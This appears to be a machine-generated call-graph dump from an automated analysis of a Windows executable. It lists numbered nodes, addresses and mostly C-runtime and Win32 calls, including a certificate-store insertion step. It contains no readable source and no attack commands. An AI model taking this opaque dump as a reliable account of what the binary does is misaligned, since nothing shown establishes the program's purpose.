CertFreeCertificateContext 5091->5094 5095 9a1126 CertAddCertificateContextToStore 5091->5095 5092->5078 5092->5093 5093->5078 5094->5090 5095->5094 5096->5085 5098 9a37d1 _abort _free 5097->5098 5098->5044 5099 9a4424 _abort 33 API calls 5098->5099 5102 9a3e9a 5099->5102 5100 9a3f24 _abort 33 API calls 5101 9a3ec4 5100->5101 5102->5100 5104 9a140c 5103->5104 5104->5038 5104->5055 5686 9a355e 5105->5686 5107 9a378f 5107->5056 5110 9a17a8 ___scrt_uninitialize_crt 5108->5110 5109 9a1421 5109->5043 5110->5109 5111 9a1f7d ___scrt_uninitialize_crt 7 API calls 5110->5111 5111->5109 5113 9a1935 _abort 5112->5113 5114 9a19e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5113->5114 5115 9a1a24 _abort 5114->5115 5115->5038 5117 9a355e _abort 23 API calls 5116->5117 5118 9a37f2 5117->5118 5118->5039 5120 9a355e _abort 23 API calls 5119->5120 5121 9a1488 5120->5121 5123 9a1640 5122->5123 5124 9a1f5e 5123->5124 5138 9a24b1 5124->5138 5127 9a1f67 5127->5065 5129 9a1f6f 5130 9a1f7a 5129->5130 5152 9a24ed 5129->5152 5130->5065 5133 9a1f90 5132->5133 5134 9a1f86 5132->5134 5133->5066 5135 9a2496 ___vcrt_uninitialize_ptd 6 API calls 5134->5135 5136 9a1f8b 5135->5136 5137 9a24ed ___vcrt_uninitialize_locks DeleteCriticalSection 5136->5137 5137->5133 5139 9a24ba 5138->5139 5141 9a24e3 5139->5141 5142 9a1f63 5139->5142 5156 9a271d 5139->5156 5143 9a24ed ___vcrt_uninitialize_locks DeleteCriticalSection 5141->5143 5142->5127 5144 9a2463 5142->5144 5143->5142 5173 9a262e 5144->5173 5149 9a2493 5149->5129 5151 9a2478 5151->5129 5153 9a2517 5152->5153 5154 9a24f8 5152->5154 5153->5127 5155 9a2502 DeleteCriticalSection 5154->5155 5155->5153 5155->5155 5161 9a2543 5156->5161 5159 9a2755 InitializeCriticalSectionAndSpinCount 5160 9a2740 5159->5160 5160->5139 5162 9a2560 5161->5162 5163 9a2564 5161->5163 5162->5159 5162->5160 5163->5162 5164 9a25cc GetProcAddress 5163->5164 5166 9a25bd 5163->5166 5168 9a25e3 LoadLibraryExW 5163->5168 5164->5162 5166->5164 5167 9a25c5 
FreeLibrary 5166->5167 5167->5164 5169 9a25fa GetLastError 5168->5169 5170 9a262a 5168->5170 5169->5170 5171 9a2605 ___vcrt_FlsGetValue 5169->5171 5170->5163 5171->5170 5172 9a261b LoadLibraryExW 5171->5172 5172->5163 5174 9a2543 ___vcrt_FlsGetValue 5 API calls 5173->5174 5175 9a2648 5174->5175 5176 9a2661 TlsAlloc 5175->5176 5177 9a246d 5175->5177 5177->5151 5178 9a26df 5177->5178 5179 9a2543 ___vcrt_FlsGetValue 5 API calls 5178->5179 5180 9a26f9 5179->5180 5181 9a2714 TlsSetValue 5180->5181 5182 9a2486 5180->5182 5181->5182 5182->5149 5183 9a2496 5182->5183 5184 9a24a6 5183->5184 5185 9a24a0 5183->5185 5184->5151 5187 9a2669 5185->5187 5188 9a2543 ___vcrt_FlsGetValue 5 API calls 5187->5188 5189 9a2683 5188->5189 5190 9a269b TlsFree 5189->5190 5191 9a268f 5189->5191 5190->5191 5191->5184 5193 9a1a47 GetStartupInfoW 5192->5193 5193->5071 5195 9a523d 5194->5195 5196 9a5234 5194->5196 5195->5076 5201 9a512a 5196->5201 5683 9a555d 5198->5683 5221 9a4424 GetLastError 5201->5221 5203 9a5137 5241 9a5249 5203->5241 5205 9a513f 5250 9a4ebe 5205->5250 5208 9a5156 5208->5195 5212 9a518c 5214 9a5194 5212->5214 5216 9a51b1 5212->5216 5272 9a47f9 5214->5272 5217 9a51dd 5216->5217 5218 9a4869 _free 15 API calls 5216->5218 5220 9a5199 5217->5220 5281 9a4d94 5217->5281 5218->5217 5275 9a4869 5220->5275 5222 9a443a 5221->5222 5223 9a4440 5221->5223 5284 9a5904 5222->5284 5227 9a448f SetLastError 5223->5227 5289 9a480c 5223->5289 5227->5203 5228 9a445a 5230 9a4869 _free 15 API calls 5228->5230 5232 9a4460 5230->5232 5231 9a446f 5231->5228 5233 9a4476 5231->5233 5235 9a449b SetLastError 5232->5235 5301 9a4296 5233->5301 5306 9a3f24 5235->5306 5238 9a4869 _free 15 API calls 5240 9a4488 5238->5240 5240->5227 5240->5235 5242 9a5255 ___scrt_is_nonwritable_in_current_image 5241->5242 5243 9a4424 _abort 33 API calls 5242->5243 5244 9a525f 5243->5244 5247 9a52e3 _abort 5244->5247 5248 9a3f24 _abort 33 API calls 5244->5248 5249 9a4869 _free 15 API calls 5244->5249 5542 9a56e2 
EnterCriticalSection 5244->5542 5543 9a52da 5244->5543 5247->5205 5248->5244 5249->5244 5547 9a3f72 5250->5547 5253 9a4edf GetOEMCP 5255 9a4f08 5253->5255 5254 9a4ef1 5254->5255 5256 9a4ef6 GetACP 5254->5256 5255->5208 5257 9a62ff 5255->5257 5256->5255 5258 9a633d 5257->5258 5262 9a630d _free 5257->5262 5260 9a47f9 _free 15 API calls 5258->5260 5259 9a6328 HeapAlloc 5261 9a5167 5259->5261 5259->5262 5260->5261 5261->5220 5264 9a52eb 5261->5264 5262->5258 5262->5259 5263 9a6992 _free 2 API calls 5262->5263 5263->5262 5265 9a4ebe 35 API calls 5264->5265 5266 9a530a 5265->5266 5267 9a5311 _ValidateLocalCookies 5266->5267 5268 9a535b IsValidCodePage 5266->5268 5271 9a5380 _abort 5266->5271 5267->5212 5268->5267 5269 9a536d GetCPInfo 5268->5269 5269->5267 5269->5271 5584 9a4f96 GetCPInfo 5271->5584 5273 9a44a8 _free 15 API calls 5272->5273 5274 9a47fe 5273->5274 5274->5220 5276 9a489d _free 5275->5276 5277 9a4874 HeapFree 5275->5277 5276->5208 5277->5276 5278 9a4889 5277->5278 5279 9a47f9 _free 13 API calls 5278->5279 5280 9a488f GetLastError 5279->5280 5280->5276 5647 9a4d51 5281->5647 5283 9a4db8 5283->5220 5317 9a5741 5284->5317 5286 9a592b 5287 9a5943 TlsGetValue 5286->5287 5288 9a5937 _ValidateLocalCookies 5286->5288 5287->5288 5288->5223 5290 9a4819 _free 5289->5290 5291 9a4859 5290->5291 5292 9a4844 HeapAlloc 5290->5292 5330 9a6992 5290->5330 5294 9a47f9 _free 14 API calls 5291->5294 5292->5290 5293 9a4452 5292->5293 5293->5228 5296 9a595a 5293->5296 5294->5293 5297 9a5741 _free 5 API calls 5296->5297 5298 9a5981 5297->5298 5299 9a599c TlsSetValue 5298->5299 5300 9a5990 _ValidateLocalCookies 5298->5300 5299->5300 5300->5231 5344 9a426e 5301->5344 5452 9a6b14 5306->5452 5309 9a3f35 5310 9a3f3e IsProcessorFeaturePresent 5309->5310 5316 9a3f5c 5309->5316 5312 9a3f49 5310->5312 5480 9a4573 5312->5480 5313 9a3793 _abort 23 API calls 5315 9a3f66 5313->5315 5316->5313 5320 9a576d 5317->5320 5322 9a5771 _free 5317->5322 5318 9a5791 5321 9a579d GetProcAddress 5318->5321 
5318->5322 5320->5318 5320->5322 5323 9a57dd 5320->5323 5321->5322 5322->5286 5324 9a57fe LoadLibraryExW 5323->5324 5325 9a57f3 5323->5325 5326 9a581b GetLastError 5324->5326 5329 9a5833 5324->5329 5325->5320 5327 9a5826 LoadLibraryExW 5326->5327 5326->5329 5327->5329 5328 9a584a FreeLibrary 5328->5325 5329->5325 5329->5328 5333 9a69d6 5330->5333 5332 9a69a8 _ValidateLocalCookies 5332->5290 5334 9a69e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 9a56e2 EnterCriticalSection 5334->5339 5336 9a69ed 5340 9a6a1f 5336->5340 5338 9a6a14 _abort 5338->5332 5339->5336 5343 9a572a LeaveCriticalSection 5340->5343 5342 9a6a26 5342->5338 5343->5342 5350 9a41ae 5344->5350 5346 9a4292 5347 9a421e 5346->5347 5361 9a40b2 5347->5361 5349 9a4242 5349->5238 5351 9a41ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 9a56e2 EnterCriticalSection 5351->5356 5353 9a41c4 5357 9a41ea 5353->5357 5355 9a41e2 _abort 5355->5346 5356->5353 5360 9a572a LeaveCriticalSection 5357->5360 5359 9a41f4 5359->5355 5360->5359 5362 9a40be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 9a56e2 EnterCriticalSection 5362->5369 5364 9a40c8 5370 9a43d9 5364->5370 5366 9a40e0 5374 9a40f6 5366->5374 5368 9a40ee _abort 5368->5349 5369->5364 5371 9a440f __fassign 5370->5371 5372 9a43e8 __fassign 5370->5372 5371->5366 5372->5371 5377 9a6507 5372->5377 5451 9a572a LeaveCriticalSection 5374->5451 5376 9a4100 5376->5368 5378 9a6587 5377->5378 5381 9a651d 5377->5381 5380 9a4869 _free 15 API calls 5378->5380 5403 9a65d5 5378->5403 5382 9a65a9 5380->5382 5381->5378 5384 9a4869 _free 15 API calls 5381->5384 5399 9a6550 5381->5399 5383 9a4869 _free 15 API calls 5382->5383 5385 9a65bc 5383->5385 5388 9a6545 5384->5388 5390 9a4869 _free 15 API calls 5385->5390 5386 9a4869 _free 15 API calls 5391 9a657c 5386->5391 5387 9a6643 5393 9a4869 _free 15 API calls 5387->5393 5405 9a6078 5388->5405 5389 9a4869 _free 15 API calls 5396 9a6567 5389->5396 5397 9a65ca 5390->5397 5392 9a4869 _free 15 API calls 
5391->5392 5392->5378 5398 9a6649 5393->5398 5394 9a4869 15 API calls _free 5404 9a65e3 5394->5404 5433 9a6176 5396->5433 5401 9a4869 _free 15 API calls 5397->5401 5398->5371 5399->5389 5402 9a6572 5399->5402 5401->5403 5402->5386 5445 9a667a 5403->5445 5404->5387 5404->5394 5406 9a6089 5405->5406 5432 9a6172 5405->5432 5407 9a609a 5406->5407 5408 9a4869 _free 15 API calls 5406->5408 5409 9a60ac 5407->5409 5410 9a4869 _free 15 API calls 5407->5410 5408->5407 5411 9a60be 5409->5411 5413 9a4869 _free 15 API calls 5409->5413 5410->5409 5412 9a60d0 5411->5412 5414 9a4869 _free 15 API calls 5411->5414 5415 9a60e2 5412->5415 5416 9a4869 _free 15 API calls 5412->5416 5413->5411 5414->5412 5417 9a60f4 5415->5417 5418 9a4869 _free 15 API calls 5415->5418 5416->5415 5419 9a6106 5417->5419 5421 9a4869 _free 15 API calls 5417->5421 5418->5417 5420 9a6118 5419->5420 5422 9a4869 _free 15 API calls 5419->5422 5423 9a612a 5420->5423 5424 9a4869 _free 15 API calls 5420->5424 5421->5419 5422->5420 5425 9a613c 5423->5425 5426 9a4869 _free 15 API calls 5423->5426 5424->5423 5427 9a4869 _free 15 API calls 5425->5427 5429 9a614e 5425->5429 5426->5425 5427->5429 5428 9a4869 _free 15 API calls 5430 9a6160 5428->5430 5429->5428 5429->5430 5431 9a4869 _free 15 API calls 5430->5431 5430->5432 5431->5432 5432->5399 5434 9a61db 5433->5434 5435 9a6183 5433->5435 5434->5402 5436 9a6193 5435->5436 5437 9a4869 _free 15 API calls 5435->5437 5438 9a61a5 5436->5438 5439 9a4869 _free 15 API calls 5436->5439 5437->5436 5440 9a61b7 5438->5440 5441 9a4869 _free 15 API calls 5438->5441 5439->5438 5442 9a61c9 5440->5442 5443 9a4869 _free 15 API calls 5440->5443 5441->5440 5442->5434 5444 9a4869 _free 15 API calls 5442->5444 5443->5442 5444->5434 5446 9a6687 5445->5446 5450 9a66a5 5445->5450 5447 9a621b __fassign 15 API calls 5446->5447 5446->5450 5448 9a669f 5447->5448 5449 9a4869 _free 15 API calls 5448->5449 5449->5450 5450->5404 5451->5376 5484 9a6a82 5452->5484 5455 9a6b6f 5456 9a6b7b _abort 5455->5456 
5460 9a6ba8 _abort 5456->5460 5462 9a6ba2 _abort 5456->5462 5498 9a44a8 GetLastError 5456->5498 5458 9a6bf4 5459 9a47f9 _free 15 API calls 5458->5459 5461 9a6bf9 5459->5461 5466 9a6c20 5460->5466 5520 9a56e2 EnterCriticalSection 5460->5520 5517 9a473d 5461->5517 5462->5458 5462->5460 5465 9a6bd7 _abort 5462->5465 5465->5309 5467 9a6c7f 5466->5467 5473 9a6c77 5466->5473 5477 9a6caa 5466->5477 5521 9a572a LeaveCriticalSection 5466->5521 5467->5477 5522 9a6b66 5467->5522 5470 9a3793 _abort 23 API calls 5470->5467 5473->5470 5474 9a4424 _abort 33 API calls 5478 9a6d0d 5474->5478 5476 9a6b66 _abort 33 API calls 5476->5477 5525 9a6d2f 5477->5525 5478->5465 5479 9a4424 _abort 33 API calls 5478->5479 5479->5465 5481 9a458f _abort 5480->5481 5482 9a45bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 9a468c _abort _ValidateLocalCookies 5482->5483 5483->5316 5487 9a6a28 5484->5487 5486 9a3f29 5486->5309 5486->5455 5488 9a6a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 9a56e2 EnterCriticalSection 5488->5493 5490 9a6a42 5494 9a6a76 5490->5494 5492 9a6a69 _abort 5492->5486 5493->5490 5497 9a572a LeaveCriticalSection 5494->5497 5496 9a6a80 5496->5492 5497->5496 5499 9a44c1 5498->5499 5503 9a44c7 5498->5503 5501 9a5904 _free 6 API calls 5499->5501 5500 9a480c _free 12 API calls 5502 9a44d9 5500->5502 5501->5503 5505 9a44e1 5502->5505 5507 9a595a _free 6 API calls 5502->5507 5503->5500 5504 9a451e SetLastError 5503->5504 5506 9a4527 5504->5506 5508 9a4869 _free 12 API calls 5505->5508 5506->5462 5509 9a44f6 5507->5509 5510 9a44e7 5508->5510 5509->5505 5511 9a44fd 5509->5511 5512 9a4515 SetLastError 5510->5512 5513 9a4296 _free 12 API calls 5511->5513 5512->5506 5514 9a4508 5513->5514 5515 9a4869 _free 12 API calls 5514->5515 5516 9a450e 5515->5516 5516->5504 5516->5512 5529 9a46c2 5517->5529 5519 9a4749 5519->5465 5520->5466 5521->5473 5523 9a4424 _abort 33 API calls 5522->5523 5524 9a6b6b 5523->5524 5524->5476 5526 9a6cfe 
5525->5526 5527 9a6d35 5525->5527 5526->5465 5526->5474 5526->5478 5541 9a572a LeaveCriticalSection 5527->5541 5530 9a44a8 _free 15 API calls 5529->5530 5531 9a46d8 5530->5531 5534 9a46e6 _ValidateLocalCookies 5531->5534 5537 9a474d IsProcessorFeaturePresent 5531->5537 5533 9a473c 5535 9a46c2 _abort 21 API calls 5533->5535 5534->5519 5536 9a4749 5535->5536 5536->5519 5538 9a4758 5537->5538 5539 9a4573 _abort 3 API calls 5538->5539 5540 9a476d GetCurrentProcess TerminateProcess 5539->5540 5540->5533 5541->5526 5542->5244 5546 9a572a LeaveCriticalSection 5543->5546 5545 9a52e1 5545->5244 5546->5545 5548 9a3f8f 5547->5548 5554 9a3f85 5547->5554 5549 9a4424 _abort 33 API calls 5548->5549 5548->5554 5550 9a3fb0 5549->5550 5555 9a72d1 5550->5555 5554->5253 5554->5254 5556 9a72e4 5555->5556 5558 9a3fc9 5555->5558 5556->5558 5563 9a6754 5556->5563 5559 9a72fe 5558->5559 5560 9a7326 5559->5560 5561 9a7311 5559->5561 5560->5554 5561->5560 5562 9a5249 __fassign 33 API calls 5561->5562 5562->5560 5564 9a6760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 9a4424 _abort 33 API calls 5564->5565 5566 9a6769 5565->5566 5567 9a67b7 _abort 5566->5567 5575 9a56e2 EnterCriticalSection 5566->5575 5567->5558 5569 9a6787 5576 9a67cb 5569->5576 5574 9a3f24 _abort 33 API calls 5574->5567 5575->5569 5577 9a679b 5576->5577 5578 9a67d9 __fassign 5576->5578 5580 9a67ba 5577->5580 5578->5577 5579 9a6507 __fassign 15 API calls 5578->5579 5579->5577 5583 9a572a LeaveCriticalSection 5580->5583 5582 9a67ae 5582->5567 5582->5574 5583->5582 5587 9a507a _ValidateLocalCookies 5584->5587 5588 9a4fd0 5584->5588 5586 9a5031 5604 9a7cd1 5586->5604 5587->5267 5592 9a634d 5588->5592 5591 9a7cd1 38 API calls 5591->5587 5593 9a3f72 __fassign 33 API calls 5592->5593 5594 9a636d MultiByteToWideChar 5593->5594 5596 9a63ab 5594->5596 5599 9a6443 _ValidateLocalCookies 5594->5599 5598 9a62ff 16 API calls 5596->5598 5601 9a63cc _abort __alloca_probe_16 5596->5601 5597 9a643d 5609 9a646a 5597->5609 5598->5601 
5599->5586 5601->5597 5602 9a6411 MultiByteToWideChar 5601->5602 5602->5597 5603 9a642d GetStringTypeW 5602->5603 5603->5597 5605 9a3f72 __fassign 33 API calls 5604->5605 5606 9a7ce4 5605->5606 5613 9a7ab4 5606->5613 5608 9a5052 5608->5591 5610 9a6487 5609->5610 5611 9a6476 5609->5611 5610->5599 5611->5610 5612 9a4869 _free 15 API calls 5611->5612 5612->5610 5614 9a7acf 5613->5614 5615 9a7af5 MultiByteToWideChar 5614->5615 5616 9a7b1f 5615->5616 5617 9a7ca9 _ValidateLocalCookies 5615->5617 5618 9a62ff 16 API calls 5616->5618 5621 9a7b40 __alloca_probe_16 5616->5621 5617->5608 5618->5621 5619 9a7b89 MultiByteToWideChar 5620 9a7bf5 5619->5620 5622 9a7ba2 5619->5622 5624 9a646a __freea 15 API calls 5620->5624 5621->5619 5621->5620 5638 9a5a15 5622->5638 5624->5617 5625 9a7bb9 5625->5620 5626 9a7bcc 5625->5626 5627 9a7c04 5625->5627 5626->5620 5629 9a5a15 6 API calls 5626->5629 5630 9a62ff 16 API calls 5627->5630 5633 9a7c25 __alloca_probe_16 5627->5633 5628 9a7c9a 5632 9a646a __freea 15 API calls 5628->5632 5629->5620 5630->5633 5631 9a5a15 6 API calls 5634 9a7c79 5631->5634 5632->5620 5633->5628 5633->5631 5634->5628 5635 9a7c88 WideCharToMultiByte 5634->5635 5635->5628 5636 9a7cc8 5635->5636 5637 9a646a __freea 15 API calls 5636->5637 5637->5620 5639 9a5741 _free 5 API calls 5638->5639 5640 9a5a3c 5639->5640 5643 9a5a45 _ValidateLocalCookies 5640->5643 5644 9a5a9d 5640->5644 5642 9a5a85 LCMapStringW 5642->5643 5643->5625 5645 9a5741 _free 5 API calls 5644->5645 5646 9a5ac4 _ValidateLocalCookies 5645->5646 5646->5642 5648 9a4d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 9a56e2 EnterCriticalSection 5648->5655 5650 9a4d67 5656 9a4dbc 5650->5656 5654 9a4d80 _abort 5654->5283 5655->5650 5668 9a54dc 5656->5668 5658 9a4e0a 5659 9a54dc 21 API calls 5658->5659 5660 9a4e26 5659->5660 5661 9a54dc 21 API calls 5660->5661 5662 9a4e44 5661->5662 5663 9a4d74 5662->5663 5664 9a4869 _free 15 API calls 5662->5664 5665 9a4d88 5663->5665 5664->5663 5682 9a572a 
LeaveCriticalSection 5665->5682 5667 9a4d92 5667->5654 5669 9a54ed 5668->5669 5678 9a54e9 5668->5678 5670 9a54f4 5669->5670 5673 9a5507 _abort 5669->5673 5671 9a47f9 _free 15 API calls 5670->5671 5672 9a54f9 5671->5672 5674 9a473d _abort 21 API calls 5672->5674 5675 9a553e 5673->5675 5676 9a5535 5673->5676 5673->5678 5674->5678 5675->5678 5680 9a47f9 _free 15 API calls 5675->5680 5677 9a47f9 _free 15 API calls 5676->5677 5679 9a553a 5677->5679 5678->5658 5681 9a473d _abort 21 API calls 5679->5681 5680->5679 5681->5678 5682->5667 5684 9a3f72 __fassign 33 API calls 5683->5684 5685 9a5571 5684->5685 5685->5076 5687 9a356a _abort 5686->5687 5688 9a3582 5687->5688 5701 9a36b8 GetModuleHandleW 5687->5701 5708 9a56e2 EnterCriticalSection 5688->5708 5695 9a3671 _abort 5695->5107 5696 9a35ff _abort 5712 9a3668 5696->5712 5699 9a358a 5699->5696 5709 9a3c97 5699->5709 5702 9a3576 5701->5702 5702->5688 5703 9a36fc GetModuleHandleExW 5702->5703 5704 9a3726 GetProcAddress 5703->5704 5707 9a373b 5703->5707 5704->5707 5705 9a374f FreeLibrary 5706 9a3758 _ValidateLocalCookies 5705->5706 5706->5688 5707->5705 5707->5706 5708->5699 5723 9a39d0 5709->5723 5743 9a572a LeaveCriticalSection 5712->5743 5714 9a3641 5714->5695 5715 9a3677 5714->5715 5744 9a5b1f 5715->5744 5717 9a3681 5718 9a36a5 5717->5718 5719 9a3685 GetPEB 5717->5719 5721 9a36fc _abort 3 API calls 5718->5721 5719->5718 5720 9a3695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 9a36ad ExitProcess 5721->5722 5726 9a397f 5723->5726 5725 9a39f4 5725->5696 5727 9a398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 9a56e2 EnterCriticalSection 5727->5734 5729 9a3999 5735 9a3a20 5729->5735 5731 9a39a6 5739 9a39c4 5731->5739 5733 9a39b7 _abort 5733->5725 5734->5729 5736 9a3a48 5735->5736 5738 9a3a40 _ValidateLocalCookies 5735->5738 5737 9a4869 _free 15 API calls 5736->5737 5736->5738 5737->5738 5738->5731 5742 9a572a LeaveCriticalSection 5739->5742 5741 9a39ce 5741->5733 5742->5741 5743->5714 5745 9a5b3a 
_ValidateLocalCookies 5744->5745 5746 9a5b44 5744->5746 5745->5717 5747 9a5741 _free 5 API calls 5746->5747 5747->5745 6725 9a324d 6726 9a522b 46 API calls 6725->6726 6727 9a325f 6726->6727 6736 9a561e GetEnvironmentStringsW 6727->6736 6730 9a326a 6732 9a4869 _free 15 API calls 6730->6732 6733 9a329f 6732->6733 6734 9a3275 6735 9a4869 _free 15 API calls 6734->6735 6735->6730 6737 9a5635 6736->6737 6747 9a5688 6736->6747 6740 9a563b WideCharToMultiByte 6737->6740 6738 9a3264 6738->6730 6748 9a32a5 6738->6748 6739 9a5691 FreeEnvironmentStringsW 6739->6738 6741 9a5657 6740->6741 6740->6747 6742 9a62ff 16 API calls 6741->6742 6743 9a565d 6742->6743 6744 9a567a 6743->6744 6745 9a5664 WideCharToMultiByte 6743->6745 6746 9a4869 _free 15 API calls 6744->6746 6745->6744 6746->6747 6747->6738 6747->6739 6749 9a32ba 6748->6749 6750 9a480c _free 15 API calls 6749->6750 6751 9a32e1 6750->6751 6752 9a3345 6751->6752 6755 9a480c _free 15 API calls 6751->6755 6756 9a3347 6751->6756 6761 9a3369 6751->6761 6763 9a4869 _free 15 API calls 6751->6763 6765 9a3eca 6751->6765 6753 9a4869 _free 15 API calls 6752->6753 6754 9a335f 6753->6754 6754->6734 6755->6751 6757 9a3376 15 API calls 6756->6757 6759 9a334d 6757->6759 6760 9a4869 _free 15 API calls 6759->6760 6760->6752 6762 9a474d _abort 6 API calls 6761->6762 6764 9a3375 6762->6764 6763->6751 6766 9a3ee5 6765->6766 6767 9a3ed7 6765->6767 6768 9a47f9 _free 15 API calls 6766->6768 6767->6766 6772 9a3efc 6767->6772 6769 9a3eed 6768->6769 6770 9a473d _abort 21 API calls 6769->6770 6771 9a3ef7 6770->6771 6771->6751 6772->6771 6773 9a47f9 _free 15 API calls 6772->6773 6773->6769 6774 9a1442 6775 9a1a6a GetModuleHandleW 6774->6775 6776 9a144a 6775->6776 6777 9a144e 6776->6777 6778 9a1480 6776->6778 6781 9a1459 6777->6781 6783 9a3775 6777->6783 6779 9a3793 _abort 23 API calls 6778->6779 6782 9a1488 6779->6782 6784 9a355e _abort 23 API calls 6783->6784 6785 9a3780 6784->6785 6785->6781 6001 9a9ec3 6002 9a9ed9 6001->6002 6003 9a9ecd 6001->6003 
6003->6002 6004 9a9ed2 CloseHandle 6003->6004 6004->6002 6529 9a3400 6530 9a3418 6529->6530 6531 9a3412 6529->6531 6532 9a3376 15 API calls 6531->6532 6532->6530 6533 9a1e00 6534 9a1e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6533->6534 6535 9a1e9e _ValidateLocalCookies 6534->6535 6538 9a2340 RtlUnwind 6534->6538 6537 9a1f27 _ValidateLocalCookies 6538->6537 6786 9a3d41 6789 9a341b 6786->6789 6790 9a342a 6789->6790 6791 9a3376 15 API calls 6790->6791 6792 9a3444 6791->6792 6793 9a3376 15 API calls 6792->6793 6794 9a344f 6793->6794 5813 9a3d86 5814 9a1f7d ___scrt_uninitialize_crt 7 API calls 5813->5814 5815 9a3d8d 5814->5815 6795 9a9146 IsProcessorFeaturePresent 6005 9a98c5 6007 9a98ed 6005->6007 6006 9a9925 6007->6006 6008 9a991e 6007->6008 6009 9a9917 6007->6009 6018 9a9980 6008->6018 6014 9a9997 6009->6014 6015 9a99a0 6014->6015 6022 9aa06f 6015->6022 6017 9a991c 6019 9a99a0 6018->6019 6020 9aa06f __startOneArgErrorHandling 16 API calls 6019->6020 6021 9a9923 6020->6021 6023 9aa0ae __startOneArgErrorHandling 6022->6023 6025 9aa130 __startOneArgErrorHandling 6023->6025 6028 9aa472 6023->6028 6027 9aa166 _ValidateLocalCookies 6025->6027 6031 9aa786 6025->6031 6027->6017 6038 9aa495 6028->6038 6032 9aa7a8 6031->6032 6033 9aa793 6031->6033 6035 9a47f9 _free 15 API calls 6032->6035 6034 9aa7ad 6033->6034 6036 9a47f9 _free 15 API calls 6033->6036 6034->6027 6035->6034 6037 9aa7a0 6036->6037 6037->6027 6039 9aa4c0 __raise_exc 6038->6039 6040 9aa6b9 RaiseException 6039->6040 6041 9aa490 6040->6041 6041->6025 5816 9a48bb 5817 9a48cb 5816->5817 5825 9a48e1 5816->5825 5818 9a47f9 _free 15 API calls 5817->5818 5819 9a48d0 5818->5819 5820 9a473d _abort 21 API calls 5819->5820 5822 9a48da 5820->5822 5823 9a49b9 5828 9a4869 _free 15 API calls 5823->5828 5826 9a494b 5825->5826 5829 9a4a2c 5825->5829 5835 9a4a4b 5825->5835 5846 9a31ec 5826->5846 5827 9a49b0 5827->5823 5832 9a4a3e 5827->5832 5852 9a79bb 5827->5852 5828->5829 5861 9a4c65 
5829->5861 5833 9a474d _abort 6 API calls 5832->5833 5834 9a4a4a 5833->5834 5836 9a4a57 5835->5836 5836->5836 5837 9a480c _free 15 API calls 5836->5837 5838 9a4a85 5837->5838 5839 9a79bb 21 API calls 5838->5839 5840 9a4ab1 5839->5840 5841 9a474d _abort 6 API calls 5840->5841 5842 9a4ae0 _abort 5841->5842 5843 9a4b81 FindFirstFileExA 5842->5843 5844 9a4bd0 5843->5844 5845 9a4a4b 21 API calls 5844->5845 5847 9a3201 5846->5847 5848 9a31fd 5846->5848 5847->5848 5849 9a480c _free 15 API calls 5847->5849 5848->5827 5850 9a322f 5849->5850 5851 9a4869 _free 15 API calls 5850->5851 5851->5848 5854 9a790a 5852->5854 5853 9a791f 5855 9a47f9 _free 15 API calls 5853->5855 5856 9a7924 5853->5856 5854->5853 5854->5856 5859 9a795b 5854->5859 5857 9a794a 5855->5857 5856->5827 5858 9a473d _abort 21 API calls 5857->5858 5858->5856 5859->5856 5860 9a47f9 _free 15 API calls 5859->5860 5860->5857 5862 9a4c6f 5861->5862 5863 9a4c7f 5862->5863 5864 9a4869 _free 15 API calls 5862->5864 5865 9a4869 _free 15 API calls 5863->5865 5864->5862 5866 9a4c86 5865->5866 5866->5822 5867 9a14bb IsProcessorFeaturePresent 5868 9a14d0 5867->5868 5871 9a1493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5868->5871 5870 9a15b3 5871->5870 6042 9a12fb 6047 9a1aac SetUnhandledExceptionFilter 6042->6047 6044 9a1300 6048 9a38f9 6044->6048 6046 9a130b 6047->6044 6049 9a391f 6048->6049 6050 9a3905 6048->6050 6049->6046 6050->6049 6051 9a47f9 _free 15 API calls 6050->6051 6052 9a390f 6051->6052 6053 9a473d _abort 21 API calls 6052->6053 6054 9a391a 6053->6054 6054->6046 5872 9a1ab8 5873 9a1aef 5872->5873 5874 9a1aca 5872->5874 5874->5873 5881 9a209a 5874->5881 5893 9a23c3 5881->5893 5884 9a20a3 5885 9a23c3 43 API calls 5884->5885 5886 9a1b06 5885->5886 5887 9a3e89 5886->5887 5888 9a3e95 _abort 5887->5888 5889 9a4424 _abort 33 API calls 5888->5889 5890 9a3e9a 5889->5890 5891 9a3f24 _abort 33 API calls 5890->5891 5892 9a3ec4 5891->5892 5907 9a23d1 5893->5907 5895 9a23c8 5896 
9a1afc 5895->5896 5897 9a6b14 _abort 2 API calls 5895->5897 5896->5884 5898 9a3f29 5897->5898 5899 9a3f35 5898->5899 5902 9a6b6f _abort 33 API calls 5898->5902 5900 9a3f3e IsProcessorFeaturePresent 5899->5900 5901 9a3f5c 5899->5901 5903 9a3f49 5900->5903 5904 9a3793 _abort 23 API calls 5901->5904 5902->5899 5905 9a4573 _abort 3 API calls 5903->5905 5906 9a3f66 5904->5906 5905->5901 5908 9a23da 5907->5908 5909 9a23dd GetLastError 5907->5909 5908->5895 5919 9a26a4 5909->5919 5912 9a2411 5913 9a2457 SetLastError 5912->5913 5913->5895 5914 9a26df ___vcrt_FlsSetValue 6 API calls 5915 9a240b 5914->5915 5915->5912 5916 9a2433 5915->5916 5917 9a26df ___vcrt_FlsSetValue 6 API calls 5915->5917 5916->5912 5918 9a26df ___vcrt_FlsSetValue 6 API calls 5916->5918 5917->5916 5918->5912 5920 9a2543 ___vcrt_FlsGetValue 5 API calls 5919->5920 5921 9a26be 5920->5921 5922 9a26d6 TlsGetValue 5921->5922 5923 9a23f2 5921->5923 5922->5923 5923->5912 5923->5913 5923->5914 6539 9a383f 6540 9a384b ___scrt_is_nonwritable_in_current_image 6539->6540 6541 9a3882 _abort 6540->6541 6547 9a56e2 EnterCriticalSection 6540->6547 6543 9a385f 6544 9a67cb __fassign 15 API calls 6543->6544 6545 9a386f 6544->6545 6548 9a3888 6545->6548 6547->6543 6551 9a572a LeaveCriticalSection 6548->6551 6550 9a388f 